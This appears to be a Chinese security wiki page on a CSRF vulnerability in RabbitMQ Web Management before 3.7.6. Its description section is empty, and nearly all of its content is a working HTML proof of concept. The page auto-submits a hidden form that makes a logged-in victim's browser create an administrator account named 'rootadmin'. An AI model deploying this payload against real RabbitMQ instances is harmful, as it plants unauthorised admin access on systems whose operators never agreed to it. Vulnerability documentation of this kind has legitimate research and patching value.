menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right RabbitMQ Web管理csrf漏洞 chevron_right RabbitMQ Web管理csrf漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    RabbitMQ Web管理csrf漏洞.md
    674 B / 2021-07-15 20:02:22
        RabbitMQ Web管理csrf漏洞
========================

一、漏洞简介
------------

二、漏洞影响
------------

RabbitMQ Web Management \< 3.7.6

三、复现过程
------------

    <html> 
    <h2>Add RabbitMQ Admin</h2>
    <body>
    <form name="rabbit" id="rabbit" action="https://www.0-sec.org/api/users/rootadmin" method="POST">
    <input type="hidden" name="username" value="rootadmin" />
    <input type="hidden" name="password" value="rootadmin" />
    <input type="hidden" name="tags" value="administrator" />
    <input type="submit"  value="save" />
    </form>
    <script>
      window.onload = rabbit.submit()
    </script>
    </body>
    </html>
    links
    file_download